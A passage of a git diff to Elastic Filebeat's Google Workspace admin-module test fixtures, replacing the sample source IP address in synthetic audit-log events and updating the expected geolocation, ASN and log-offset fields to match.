-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json
index a6a661e76c10..9553952fe797 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json
@@ -9,7 +9,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -32,23 +32,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -70,7 +66,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -89,26 +85,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 641,
+        "log.offset": 640,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -130,7 +122,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -149,26 +141,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1247,
+        "log.offset": 1245,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -189,7 +177,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -207,26 +195,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1853,
+        "log.offset": 1850,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -248,7 +232,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -261,26 +245,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2346,
+        "log.offset": 2342,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -301,7 +281,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -314,26 +294,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2770,
+        "log.offset": 2765,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -354,7 +330,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -367,26 +343,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3218,
+        "log.offset": 3212,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -408,7 +380,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -421,26 +393,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3666,
+        "log.offset": 3659,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -462,7 +430,7 @@
